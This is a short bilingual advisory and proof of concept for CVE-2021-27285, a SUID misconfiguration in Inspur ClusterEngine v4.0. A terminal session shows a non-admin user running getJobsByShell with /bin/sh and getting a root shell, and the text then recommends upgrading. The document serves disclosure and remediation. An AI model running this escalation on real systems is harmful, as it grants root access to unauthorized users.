
Exploit proof-of-concept per la configurazione errata di SUID in Inspur ClusterEngine (CVE-2021-27285) che consente agli utenti non amministratori di scalare i privilegi a root tramite il componente getJobsByShell.
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。
浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。
提权过程如下:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
修复建议: 升级相关组件
La piattaforma di gestione cluster Inspur ClusterEngine è un software di job management progettato specificamente per i prodotti HPC della serie Inspur TianSuo. Una configurazione errata delle impostazioni SUID di Inspur ClusterEngine consente agli utenti non amministrativi di escalare i privilegi e ottenere accesso root attraverso alcuni componenti.
Inspur ClusterEngine v4.0 presenta un problema di configurazione SUID non corretta con il componente "/opt/tsce4/torque6/bin/getJobsByShell", consentendo agli utenti non amministrativi di escalare i privilegi e ottenere accesso root tramite il meccanismo SUID.
Il processo di escalation dei privilegi è il seguente:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
Raccomandazione: aggiornare i componenti pertinenti.